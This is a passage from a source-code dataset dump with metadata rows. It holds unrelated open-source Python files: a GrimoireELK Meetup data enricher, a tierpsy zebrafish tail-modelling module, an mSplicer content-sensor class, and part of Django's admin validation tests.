# Your local stuff: Below this line define 3rd party library settings
| mit | -7,272,907,053,856,914,000 | 30.451613 | 99 | 0.488205 | false |
grimoirelab/GrimoireELK | grimoire_elk/enriched/meetup.py | 1 | 13379 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2019 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Alvaro del Castillo San Felix <[email protected]>
#
import copy
import logging
from grimoirelab_toolkit.datetime import unixtime_to_datetime
from .enrich import Enrich, metadata
from ..elastic_mapping import Mapping as BaseMapping
MAX_SIZE_BULK_ENRICHED_ITEMS = 200
logger = logging.getLogger(__name__)
class Mapping(BaseMapping):
@staticmethod
def get_elastic_mappings(es_major):
"""Get Elasticsearch mapping.
:param es_major: major version of Elasticsearch, as string
:returns: dictionary with a key, 'items', with the mapping
"""
mapping = """
{
"properties": {
"description_analyzed": {
"type": "text",
"index": true
},
"comment": {
"type": "text",
"index": true
},
"venue_geolocation": {
"type": "geo_point"
},
"group_geolocation": {
"type": "geo_point"
}
}
} """
return {"items": mapping}
class MeetupEnrich(Enrich):
mapping = Mapping
def get_field_author(self):
return "author"
def get_identities(self, item):
''' Return the identities from an item '''
item = item['data']
# Creators
if 'event_hosts' in item:
user = self.get_sh_identity(item['event_hosts'][0])
yield user
# rsvps
rsvps = item.get('rsvps', [])
for rsvp in rsvps:
user = self.get_sh_identity(rsvp['member'])
yield user
# Comments
for comment in item['comments']:
user = self.get_sh_identity(comment['member'])
yield user
def get_sh_identity(self, item, identity_field=None):
identity = {'username': None, 'email': None, 'name': None}
if not item:
return identity
user = item
if 'data' in item and type(item) == dict:
user = item['data'][identity_field]
identity['username'] = str(user["id"])
identity['email'] = None
identity['name'] = user["name"]
return identity
def get_project_repository(self, eitem):
return eitem['tag']
@metadata
def get_rich_item(self, item):
# We need to detect the category of item: activities (report), events or users
eitem = {}
if 'time' not in item['data']:
logger.warning("[meetup] Not processing %s: no time field", item['uuid'])
return eitem
for f in self.RAW_FIELDS_COPY:
if f in item:
eitem[f] = item[f]
else:
eitem[f] = None
event = item['data']
# data fields to copy
copy_fields = ["id", "how_to_find_us"]
for f in copy_fields:
if f in event:
eitem[f] = event[f]
else:
eitem[f] = None
# Fields which names are translated
map_fields = {
"link": "url",
"rsvp_limit": "rsvps_limit"
}
for fn in map_fields:
if fn in event:
eitem[map_fields[fn]] = event[fn]
else:
eitem[f] = None
# event host fields: author of the event
if 'event_hosts' in event:
host = event['event_hosts'][0]
if 'photo' in host:
eitem['member_photo_url'] = host['photo']['photo_link']
eitem['member_photo_id'] = host['photo']['id']
eitem['member_photo_type'] = host['photo']['type']
eitem['member_is_host'] = True
eitem['member_id'] = host['id']
eitem['member_name'] = host['name']
eitem['member_url'] = "https://www.meetup.com/members/" + str(host['id'])
eitem['event_url'] = event['link']
# data fields to copy with meetup`prefix
copy_fields = ["description", "plain_text_description",
"name", "status", "utc_offset", "visibility",
"waitlist_count", "yes_rsvp_count", "duration",
"featured", "rsvpable"]
copy_fields_time = ["time", "updated", "created"]
for f in copy_fields:
if f in event:
eitem["meetup_" + f] = event[f]
else:
eitem[f] = None
for f in copy_fields_time:
if f in event:
eitem["meetup_" + f] = unixtime_to_datetime(event[f] / 1000).isoformat()
else:
eitem[f] = None
rsvps = event.get('rsvps', [])
eitem['num_rsvps'] = len(rsvps)
eitem['num_comments'] = len(event['comments'])
try:
if 'time' in event:
eitem['time_date'] = unixtime_to_datetime(event['time'] / 1000).isoformat()
else:
logger.warning("time field nof found in event")
return {}
except ValueError:
logger.warning("Wrong datetime for %s: %s", eitem['url'], event['time'])
# If no datetime for the enriched item, it is useless for Kibana
return {}
if 'venue' in event:
venue = event['venue']
copy_fields = ["id", "name", "city", "state", "zip", "country",
"localized_country_name", "repinned", "address_1"]
for f in copy_fields:
if f in venue:
eitem["venue_" + f] = venue[f]
else:
eitem[f] = None
eitem['venue_geolocation'] = {
"lat": event['venue']['lat'],
"lon": event['venue']['lon'],
}
if 'series' in event:
eitem['series_id'] = event['series']['id']
eitem['series_description'] = event['series']['description']
eitem['series_start_date'] = event['series']['start_date']
if 'group' in event:
group = event['group']
copy_fields = ["id", "created", "join_mode", "name", "url_name",
"who"]
for f in copy_fields:
if f in group:
eitem["group_" + f] = group[f]
else:
eitem[f] = None
eitem['group_geolocation'] = {
"lat": group['lat'],
"lon": group['lon'],
}
eitem['group_topics'] = []
eitem['group_topics_keys'] = []
if 'topics' in group:
group_topics = [topic['name'] for topic in group['topics']]
group_topics_keys = [topic['urlkey'] for topic in group['topics']]
eitem['group_topics'] = group_topics
eitem['group_topics_keys'] = group_topics_keys
if len(rsvps) > 0:
eitem['group_members'] = rsvps[0]['group']['members']
created = unixtime_to_datetime(event['created'] / 1000).isoformat()
eitem['type'] = "meetup"
# time_date is when the meetup will take place, the needed one in this index
# created is when the meetup entry was created and it is not the interesting date
eitem.update(self.get_grimoire_fields(eitem['time_date'], eitem['type']))
if self.sortinghat:
eitem.update(self.get_item_sh(event))
if self.prjs_map:
eitem.update(self.get_item_project(eitem))
self.add_repository_labels(eitem)
self.add_metadata_filter_raw(eitem)
return eitem
def get_item_sh(self, item):
""" Add sorting hat enrichment fields """
sh_fields = {}
# Not shared common get_item_sh because it is pretty specific
if 'member' in item:
# comment and rsvp
identity = self.get_sh_identity(item['member'])
elif 'event_hosts' in item:
# meetup event
identity = self.get_sh_identity(item['event_hosts'][0])
else:
return sh_fields
created = unixtime_to_datetime(item['created'] / 1000)
sh_fields = self.get_item_sh_fields(identity, created)
return sh_fields
def get_rich_item_comments(self, comments, eitem):
for comment in comments:
ecomment = copy.deepcopy(eitem)
created = unixtime_to_datetime(comment['created'] / 1000).isoformat()
ecomment['url'] = comment['link']
ecomment['id'] = ecomment['id'] + '_comment_' + str(comment['id'])
ecomment['comment'] = comment['comment']
ecomment['like_count'] = comment['like_count']
ecomment['type'] = 'comment'
ecomment.update(self.get_grimoire_fields(created, ecomment['type']))
ecomment.pop('is_meetup_meetup')
# event host fields: author of the event
member = comment['member']
if 'photo' in member:
ecomment['member_photo_url'] = member['photo']['photo_link']
ecomment['member_photo_id'] = member['photo']['id']
ecomment['member_photo_type'] = member['photo']['type']
if 'event_context' in member:
ecomment['member_is_host'] = member['event_context']['host']
ecomment['member_id'] = member['id']
ecomment['member_name'] = member['name']
ecomment['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
if self.sortinghat:
ecomment.update(self.get_item_sh(comment))
yield ecomment
def get_rich_item_rsvps(self, rsvps, eitem):
for rsvp in rsvps:
ersvp = copy.deepcopy(eitem)
ersvp['type'] = 'rsvp'
created = unixtime_to_datetime(rsvp['created'] / 1000).isoformat()
ersvp.update(self.get_grimoire_fields(created, ersvp['type']))
ersvp.pop('is_meetup_meetup')
# event host fields: author of the event
member = rsvp['member']
if 'photo' in member:
ersvp['member_photo_url'] = member['photo']['photo_link']
ersvp['member_photo_id'] = member['photo']['id']
ersvp['member_photo_type'] = member['photo']['type']
ersvp['member_is_host'] = member['event_context']['host']
ersvp['member_id'] = member['id']
ersvp['member_name'] = member['name']
ersvp['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['id'] = ersvp['id'] + '_rsvp_' + str(rsvp['event']['id']) + "_" + str(member['id'])
ersvp['url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['rsvps_guests'] = rsvp['guests']
ersvp['rsvps_updated'] = rsvp['updated']
ersvp['rsvps_response'] = rsvp['response']
if self.sortinghat:
ersvp.update(self.get_item_sh(rsvp))
yield ersvp
def get_field_unique_id(self):
return "id"
def enrich_items(self, ocean_backend):
items_to_enrich = []
num_items = 0
ins_items = 0
for item in ocean_backend.fetch():
eitem = self.get_rich_item(item)
if 'uuid' not in eitem:
continue
items_to_enrich.append(eitem)
if 'comments' in item['data'] and 'id' in eitem:
comments = item['data']['comments']
rich_item_comments = self.get_rich_item_comments(comments, eitem)
items_to_enrich.extend(rich_item_comments)
if 'rsvps' in item['data'] and 'id' in eitem:
rsvps = item['data']['rsvps']
rich_item_rsvps = self.get_rich_item_rsvps(rsvps, eitem)
items_to_enrich.extend(rich_item_rsvps)
if len(items_to_enrich) < MAX_SIZE_BULK_ENRICHED_ITEMS:
continue
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
items_to_enrich = []
if len(items_to_enrich) > 0:
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
if num_items != ins_items:
missing = num_items - ins_items
logger.error("%s/%s missing items for Meetup", str(missing), str(num_items))
else:
logger.info("%s items inserted for Meetup", str(num_items))
return num_items
| gpl-3.0 | -4,369,405,093,059,499,000 | 33.660622 | 101 | 0.52545 | false |
ver228/tierpsy-tracker | tierpsy/analysis/ske_create/zebrafishAnalysis/zebrafishAnalysis.py | 1 | 17590 | # Zebrafish Analysis
import math
import numpy as np
import cv2
from scipy.signal import savgol_filter
class ModelConfig:
def __init__(self, num_segments, min_angle, max_angle, num_angles, tail_length, tail_detection, prune_retention, test_width, draw_width, auto_detect_tail_length):
self.min_angle = min_angle # Minimum angle for each segment (relative to previous segment)
self.max_angle = max_angle # Maximum angle for each segment
self.num_models_per_segment = num_angles # Number of angles to try for each segment
self.prune_freq = 1 # When constructing the model, segment interval at which the model pruning function is called. Lower numbers are faster
self.max_num_models_to_keep = prune_retention # Number of models retained after each round of pruning
segment_height = int(tail_length / num_segments)
self.segment_heights = [segment_height] * num_segments # Length must match num_segments
self.segment_widths = [test_width] * num_segments # Used for constructing and testing straight-line models. Length must match num_segment
self.num_segments = num_segments
self.smoothed_segment_width = draw_width # Used for drawing the final smoothed version of the tail curve
self.tail_offset = 30 # Distance in pixels from the head point to the tail model start point
self.rotated_img_size = 200 # Size of the internal image of the rotated fish
self.tail_point_detection_algorithm = tail_detection
# Auto-detect tail length settings
self.auto_detect_tail_length = auto_detect_tail_length
if auto_detect_tail_length:
# Override number of segments with a high number
# Tail end will be detected automatically before this is reached and model generation will be stopped at that point
self.num_segments = 20
self.segment_heights = [5] * self.num_segments
self.segment_widths = [2] * self.num_segments
self.segment_score_improvement_threshold = 250 # Amount by which a segment must improve the model score to be considered valid. If 'num_fail_segments' segments in a row are considered invalid, no further segments are added to that model
self.num_fail_segments = 2 # Number of continuous segments which fail to meet the threshold improvement score for model generation to stop
self.min_segments = 5 # Minimum number of segments in the model - There will be at least this many segments, even if the failing criteria is reached
class MaskCanvas:
def __init__(self, canvas_width, canvas_height):
self.canvas = np.zeros((canvas_width, canvas_height), np.uint8)
self.points = []
self.scores = [0]
self.angle_offset = 0
def add_point(self, point):
self.points.append(point)
def last_point(self):
return self.points[-1] if len(self.points) > 0 else None
def last_score(self):
return self.scores[-1]
def score_improvement(self, n):
if len(self.scores) < n + 1:
return 0
return self.scores[-1 * n] - self.scores[-1 * (n+1)]
def getOrientation(frame, config):
th_val = 1
ret, binary_img = cv2.threshold(frame, th_val, 255, cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(binary_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
# Sort contours by area
contours.sort(key=lambda ar: cv2.contourArea(ar))
largest_contour = contours[-1]
[vx, vy, x, y] = cv2.fitLine(largest_contour, cv2.DIST_L2, 0, 0.01, 0.01)
line_angle = math.atan2(vy, vx)
line_angle_degrees = math.degrees(line_angle)
angle = line_angle_degrees + 90
x, y, w, h = cv2.boundingRect(largest_contour)
img_cropped = frame[y:y+h, x:x+w]
rotated_img, actual_angle = rotateFishImage(img_cropped, angle, config)
return rotated_img, actual_angle
def rotateFishImage(img, angle_degrees, config):
input_image = np.zeros((config.rotated_img_size, config.rotated_img_size), np.uint8)
y_mid = config.rotated_img_size // 2
def _get_range(l):
bot = math.floor(y_mid - l/2)
top = math.floor(y_mid + l/2)
return bot, top
h_ran, w_ran = list(map(_get_range, img.shape))
input_image[h_ran[0]:h_ran[1], w_ran[0]:w_ran[1]] = img
rows, cols = input_image.shape
center = (rows//2, cols//2)
M = cv2.getRotationMatrix2D(center, angle_degrees, 1.0)
rotated_img = cv2.warpAffine(input_image, M, (cols, rows))
img_top = rotated_img[0:y_mid, 0:config.rotated_img_size]
img_bottom = rotated_img[y_mid:config.rotated_img_size, 0:config.rotated_img_size]
# Use valid pixel count to determine which half contains the head
top_area = len(img_top[img_top != 0])
bottom_area = len(img_bottom[img_bottom != 0])
head_half = img_top if bottom_area < top_area else img_bottom
# Find rotation angle again, this time only using the head half
contours, hierarchy = cv2.findContours(head_half.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contours.sort(key=lambda ar: ar.size)
largest_contour = contours[-1]
[vx, vy, x, y] = cv2.fitLine(largest_contour, cv2.DIST_L2, 0, 0.01, 0.01)
line_angle = math.atan2(vy, vx)
line_angle_degrees = (math.degrees(line_angle) + 90) % 360
final_angle = (angle_degrees + line_angle_degrees) % 360
rows, cols = input_image.shape[:2]
center = (rows/2, cols/2)
M = cv2.getRotationMatrix2D(center, final_angle, 1.0)
rotated_output_img = cv2.warpAffine(input_image, M, (cols, rows))
# Check again whether the image is rotated 180 degrees, and correct if necessary
img_top = rotated_output_img[0:y_mid, 0:config.rotated_img_size]
img_bottom = rotated_output_img[y_mid:config.rotated_img_size, 0:config.rotated_img_size]
top_area = len(img_top[img_top != 0])
bottom_area = len(img_bottom[img_bottom != 0])
if bottom_area > top_area:
correction_angle = 180
M = cv2.getRotationMatrix2D(center, correction_angle, 1.0)
rotated_output_img = cv2.warpAffine(rotated_output_img, M, (cols, rows))
final_angle = (final_angle + correction_angle) % 360
return rotated_output_img, final_angle
def getHeadMask(frame):
th_val = 1
ret, img_thresh = cv2.threshold(frame, th_val, 255, cv2.THRESH_BINARY)
# Remove excess noise by drawing only the largest contour
head_mask = np.zeros((img_thresh.shape[0], img_thresh.shape[1]), np.uint8)
contours, hierarchy = cv2.findContours(img_thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contours.sort(key=lambda ar: ar.size)
head_contour = contours[-1]
cv2.drawContours(head_mask, [head_contour], 0, 255, cv2.FILLED)
return head_mask
def getHeadPoint(rotated_img, angle):
theta = math.radians(- angle)
img_binary = np.zeros(rotated_img.shape, np.uint8)
contours, hierarchy = cv2.findContours(rotated_img.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contours.sort(key=lambda ar: ar.size)
largest_contour = contours[-1]
cv2.drawContours(img_binary, [largest_contour], 0, 255, cv2.FILLED)
valid_pixels = np.nonzero(img_binary)
x = valid_pixels[1]
y = valid_pixels[0]
head_x = x[np.argmin(y)]
head_y = np.min(y)
w, h = rotated_img.shape[:2]
center_x = w / 2
center_y = h / 2
hypot = math.hypot(center_x - head_x, center_y - head_y)
rotated_head_x = center_x - (hypot * math.sin(theta))
rotated_head_y = center_y - (hypot * math.cos(theta))
return rotated_head_x, rotated_head_y
def getTailStartPoint(head_mask, head_point, config):
# Calculate the angle from the head point to the contour center
# Then, 'walk' down the line from the head point to the contour center point a set length
contours, hierarchy = cv2.findContours(head_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contour = contours[-1]
# Get contour center
contour_moments = cv2.moments(contour)
contour_center_x = int(contour_moments['m10'] / contour_moments['m00'])
contour_center_y = int(contour_moments['m01'] / contour_moments['m00'])
head_x = head_point[0]
head_y = head_point[1]
head_contour_center_angle = math.atan2(contour_center_y - head_y, contour_center_x - head_x)
head_x = head_point[0]
head_y = head_point[1]
# Calculate tail start point
tail_start_x = head_x + config.tail_offset * math.cos(head_contour_center_angle)
tail_start_y = head_y + config.tail_offset * math.sin(head_contour_center_angle)
return (int(tail_start_x), int(tail_start_y))
def getModelMasks(head_mask, base_angle, frame, head_point, config):
# Generate the test image used for scoring models
test_image = getTestImage(frame, head_mask, head_point, base_angle, config)
# Create starting object
initial_canvas = MaskCanvas(head_mask.shape[0], head_mask.shape[1])
# Add tail starting point
initial_point = getTailStartPoint(head_mask, head_point, config)
initial_canvas.add_point(initial_point)
# Set base angle
initial_canvas.angle_offset = -base_angle
canvas_set = [initial_canvas]
output_canvas_set = drawModelSegments(canvas_set, config.num_segments, test_image, config)
return output_canvas_set
def getTestImage(frame, head_mask, head_point, angle, config):
# Remove the head from the test image using a triangular mask, so it doesn't interfere with tail model scoring
center_x, center_y = getTailStartPoint(head_mask, head_point, config)
triangle_length = 100
t0_angle_radians = math.radians(angle)
t0_x = center_x + triangle_length * math.sin(t0_angle_radians)
t0_y = center_y - triangle_length * math.cos(t0_angle_radians)
t1_angle_radians = math.radians(angle - 90)
t1_x = center_x + triangle_length * math.sin(t1_angle_radians)
t1_y = center_y - triangle_length * math.cos(t1_angle_radians)
t2_angle_radians = math.radians(angle + 90)
t2_x = center_x + triangle_length * math.sin(t2_angle_radians)
t2_y = center_y - triangle_length * math.cos(t2_angle_radians)
triangle_points = np.array([(t0_x, t0_y), (t1_x, t1_y), (t2_x, t2_y)]).astype('int32')
test_image = frame.copy()
cv2.fillConvexPoly(test_image, triangle_points, 0)
return test_image
def drawModelSegments(canvas_set, num_segments, test_image, config):
angle_increment = (config.max_angle - config.min_angle) / config.num_models_per_segment
output_set = []
for canvas in canvas_set:
for i in range(0, config.num_models_per_segment + 1):
# Calculate segment rotation angle
rotation_angle = config.min_angle + (i * angle_increment)
# Draw line on canvas
new_canvas = MaskCanvas(0, 0)
new_canvas.canvas = canvas.canvas.copy()
new_canvas.points = list(canvas.points)
new_canvas.angle_offset = canvas.angle_offset
new_canvas.scores = list(canvas.scores)
segment_width = config.segment_widths[-num_segments]
segment_height = config.segment_heights[-num_segments]
canvas_with_segment = drawSegmentOnCanvas(new_canvas, rotation_angle, segment_width, segment_height)
# Add canvas to output set
output_set.append(canvas_with_segment)
# Prune the models with the lowest scores
if num_segments % config.prune_freq == 0:
end_generation, output_set = pruneModels(test_image, output_set, config.max_num_models_to_keep, config)
# If auto-detect tail length is enabled, check for 'end model generation' flag
if config.auto_detect_tail_length:
if end_generation is True and num_segments < config.num_segments - config.min_segments:
i = len(output_set[0].points) - config.num_fail_segments # Remove the final failing segments
output_set[0].points = output_set[0].points[0:i]
return output_set
# Call the function recursively until all segments have been drawn on the canvases
if num_segments > 1:
return drawModelSegments(output_set, num_segments - 1, test_image, config)
else:
return output_set
def drawSegmentOnCanvas(canvas, angle, segment_width, segment_height):
# Take into account previous angles
adjusted_angle = angle + canvas.angle_offset
# Convert angle from degrees to radians
angle_radians = math.radians(adjusted_angle)
# Calculate position of next point
pt_x = canvas.last_point()[0] + segment_height * math.sin(angle_radians)
pt_y = canvas.last_point()[1] + segment_height * math.cos(angle_radians)
pt = (int(pt_x), int(pt_y))
# Draw line connecting points
cv2.line(canvas.canvas, canvas.last_point(), pt, 255, thickness=segment_width, lineType=cv2.LINE_AA)
# Add the new point to the MaskCanvas object's list of points
canvas.add_point(pt)
# Update 'angle_offset' on the MaskCanvas object
canvas.angle_offset += angle
return canvas
def pruneModels(test_image, canvas_set, max_num_models_to_keep, config):
for canvas in canvas_set:
score = scoreModel(canvas, test_image)
canvas.scores.append(score)
# Order canvas list by scores
canvas_set.sort(key=lambda c: c.last_score())
# Remove all masks except the ones with the top scores
keep_num = max_num_models_to_keep if len(canvas_set) > max_num_models_to_keep else len(canvas_set)
pruned_set = canvas_set[-keep_num:]
# Return the pruned set of models if tail length auto-detection is off
if config.auto_detect_tail_length == False:
return False, pruned_set
# Otherwise, decide whether to continue adding segments to the models or not
best_canvas = canvas_set[-1]
# If the set continuous number of segments fail to meet the threshold improvement score,
# signal that the model should stop being generated (ie. no further segments should be added, and the final
# failing x segments should be removed from the model)
end_generation = False
for x in range(1, config.num_fail_segments + 1):
if best_canvas.score_improvement(x) > config.segment_score_improvement_threshold:
break
if x == config.num_fail_segments:
end_generation = True
return end_generation, pruned_set
def scoreModel(canvas, test_image):
# Find pixels in the test image which overlap with the model
masked_img = cv2.bitwise_and(test_image, test_image, mask=canvas.canvas)
# Get non-zero pixels
valid_pixels = masked_img[masked_img != 0]
# Adjust pixel values so that darker pixels will score higher than lighter pixels (as fish is darker than the background)
adjusted_vals = 256 - valid_pixels
# Calculate score
score = int(cv2.sumElems(adjusted_vals)[0])
return score
def smoothMaskModel(mask_canvas, config):
points = mask_canvas.points
points = np.array(points)
points = points.astype(int)
x = points[:, 0]
y = points[:, 1]
window_length = len(y)
if window_length % 2 == 0:
window_length -= 1
polyorder = 3
yhat = savgol_filter(y, window_length, polyorder)
output_points = []
for a, b in zip(x, yhat):
new_point = [a, b]
output_points.append(new_point)
output_points = np.array(output_points)
output_points = output_points.astype(int)
mask = np.zeros(mask_canvas.canvas.shape, np.uint8)
cv2.polylines(mask, [output_points], False, 255, thickness=config.smoothed_segment_width)
return mask, output_points
def getCombinationMask(head_mask, tail_mask):
combination_mask = cv2.add(head_mask, tail_mask)
return combination_mask
def cleanMask(mask):
# Apply closing to smooth the edges of the mask
kernel_size = 5
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_size, kernel_size)) # Circle
mask_closing = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
return mask_closing
def getZebrafishMask(frame, config):
# Get orientated image and rotation angle
rotated_img, angle = getOrientation(frame, config)
# Get head mask
head_mask = getHeadMask(frame)
# Get head point
head_point = getHeadPoint(rotated_img, angle)
# Get model masks
model_masks = getModelMasks(head_mask, angle, frame, head_point, config)
# Get best mask
test_image = getTestImage(frame, head_mask, head_point, angle, config)
_, mask_set = pruneModels(test_image, model_masks, 1, config)
best_mask = mask_set[0]
# Smooth the best mask
smoothed_mask, smoothed_points = smoothMaskModel(best_mask, config)
# Get combination mask
combination_mask = getCombinationMask(head_mask, smoothed_mask)
# Clean mask
cleaned_mask = cleanMask(combination_mask)
worm_mask = cleaned_mask.copy()
contours, hierarchy = cv2.findContours(cleaned_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
if len(contours) == 0:
output = None
else:
# Remove nesting from contour
worm_cnt = contours[0]
worm_cnt = np.vstack(worm_cnt).squeeze()
# Return None values if contour too small
if len(worm_cnt) < 3:
output = None
else:
cnt_area = cv2.contourArea(worm_cnt)
output = worm_mask, worm_cnt, cnt_area, \
cleaned_mask, head_point, smoothed_points
if output is None:
return [None]*6
else:
return output
| mit | -7,423,540,169,153,235,000 | 32.188679 | 248 | 0.67004 | false |
ratschlab/ASP | applications/msplicer/content_sensors.py | 1 | 2271 | #
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Written (W) 2006-2007 Soeren Sonnenburg
# Written (W) 2007 Gunnar Raetsch
# Copyright (C) 2007-2008 Fraunhofer Institute FIRST and Max-Planck-Society
#
import numpy
class content_sensors:
def __init__(self, model):
self.dict_weights_intron=numpy.array(model.dict_weights_intron, dtype=numpy.float64)
self.dict_weights_coding=numpy.array(model.dict_weights_coding, dtype=numpy.float64)
self.dicts=numpy.concatenate((self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron, self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron), axis=0)
self.dicts[0, 64:] = 0 # only order 3 info
self.dicts[1, 64:] = 0 # only order 3 info
self.dicts[2, 0:64] = 0 # only order 4 info
self.dicts[2, 320:] = 0
self.dicts[3, 0:64] = 0 # only order 4 info
self.dicts[3, 320:] = 0
self.dicts[4, 0:320] = 0 # only order 5 info
self.dicts[4, 1344:] = 0
self.dicts[5, 0:320] = 0 # only order 5 info
self.dicts[5, 1344:] = 0
self.dicts[6, 0:1344] = 0 # only order 6 info
self.dicts[7, 0:1344] = 0 # only order 6 info
self.model = model
def get_dict_weights(self):
return self.dicts.T
def initialize_content(self, dyn):
dyn.init_svm_arrays(len(self.model.word_degree), len(self.model.mod_words))
word_degree = numpy.array(self.model.word_degree, numpy.int32)
dyn.init_word_degree_array(word_degree)
mod_words = numpy.array(4**word_degree, numpy.int32)
dyn.init_num_words_array(mod_words)
cum_mod_words=numpy.zeros(len(mod_words)+1, numpy.int32)
cum_mod_words[1:] = numpy.cumsum(mod_words)
dyn.init_cum_num_words_array(cum_mod_words)
dyn.init_mod_words_array(numpy.array(self.model.mod_words, numpy.int32))
dyn.init_sign_words_array(numpy.array(self.model.sign_words, numpy.bool))
dyn.init_string_words_array(numpy.zeros(len(self.model.sign_words), numpy.int32))
assert(dyn.check_svm_arrays())
| gpl-2.0 | -2,526,926,866,745,545,700 | 39.553571 | 246 | 0.693087 | false |
disqus/django-old | tests/regressiontests/admin_validation/tests.py | 1 | 9982 | from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.contrib import admin
from django.contrib.admin.validation import validate, validate_inline
from models import Song, Book, Album, TwoAlbumFKAndAnE, State, City
class SongForm(forms.ModelForm):
pass
class ValidFields(admin.ModelAdmin):
form = SongForm
fields = ['title']
class InvalidFields(admin.ModelAdmin):
form = SongForm
fields = ['spam']
class ValidationTestCase(TestCase):
def test_readonly_and_editable(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ["original_release"]
fieldsets = [
(None, {
"fields": ["title", "original_release"],
}),
]
validate(SongAdmin, Song)
def test_custom_modelforms_with_fields_fieldsets(self):
"""
# Regression test for #8027: custom ModelForms with fields/fieldsets
"""
validate(ValidFields, Song)
self.assertRaisesMessage(ImproperlyConfigured,
"'InvalidFields.fields' refers to field 'spam' that is missing from the form.",
validate,
InvalidFields, Song)
def test_exclude_values(self):
"""
Tests for basic validation of 'exclude' option values (#12689)
"""
class ExcludedFields1(admin.ModelAdmin):
exclude = ('foo')
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFields1.exclude' must be a list or tuple.",
validate,
ExcludedFields1, Book)
def test_exclude_duplicate_values(self):
class ExcludedFields2(admin.ModelAdmin):
exclude = ('name', 'name')
self.assertRaisesMessage(ImproperlyConfigured,
"There are duplicate field(s) in ExcludedFields2.exclude",
validate,
ExcludedFields2, Book)
def test_exclude_in_inline(self):
class ExcludedFieldsInline(admin.TabularInline):
model = Song
exclude = ('foo')
class ExcludedFieldsAlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [ExcludedFieldsInline]
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFieldsInline.exclude' must be a list or tuple.",
validate,
ExcludedFieldsAlbumAdmin, Album)
def test_exclude_inline_model_admin(self):
"""
# Regression test for #9932 - exclude in InlineModelAdmin
# should not contain the ForeignKey field used in ModelAdmin.model
"""
class SongInline(admin.StackedInline):
model = Song
exclude = ['album']
class AlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [SongInline]
self.assertRaisesMessage(ImproperlyConfigured,
"SongInline cannot exclude the field 'album' - this is the foreign key to the parent model admin_validation.Album.",
validate,
AlbumAdmin, Album)
def test_app_label_in_admin_validation(self):
"""
Regression test for #15669 - Include app label in admin validation messages
"""
class RawIdNonexistingAdmin(admin.ModelAdmin):
raw_id_fields = ('nonexisting',)
self.assertRaisesMessage(ImproperlyConfigured,
"'RawIdNonexistingAdmin.raw_id_fields' refers to field 'nonexisting' that is missing from model 'admin_validation.Album'.",
validate,
RawIdNonexistingAdmin, Album)
def test_fk_exclusion(self):
"""
Regression test for #11709 - when testing for fk excluding (when exclude is
given) make sure fk_name is honored or things blow up when there is more
than one fk to the parent model.
"""
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
exclude = ("e",)
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_inline_self_validation(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
self.assertRaisesMessage(Exception,
"<class 'regressiontests.admin_validation.models.TwoAlbumFKAndAnE'> has more than 1 ForeignKey to <class 'regressiontests.admin_validation.models.Album'>",
validate_inline,
TwoAlbumFKAndAnEInline, None, Album)
def test_inline_with_specified(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_readonly(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title",)
validate(SongAdmin, Song)
def test_readonly_on_method(self):
def my_function(obj):
pass
class SongAdmin(admin.ModelAdmin):
readonly_fields = (my_function,)
validate(SongAdmin, Song)
def test_readonly_on_modeladmin(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_modeladmin",)
def readonly_method_on_modeladmin(self, obj):
pass
validate(SongAdmin, Song)
def test_readonly_method_on_model(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_model",)
validate(SongAdmin, Song)
def test_nonexistant_field(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title", "nonexistant")
self.assertRaisesMessage(ImproperlyConfigured,
"SongAdmin.readonly_fields[1], 'nonexistant' is not a callable or an attribute of 'SongAdmin' or found in the model 'Song'.",
validate,
SongAdmin, Song)
def test_nonexistant_field_on_inline(self):
class CityInline(admin.TabularInline):
model = City
readonly_fields=['i_dont_exist'] # Missing attribute
self.assertRaisesMessage(ImproperlyConfigured,
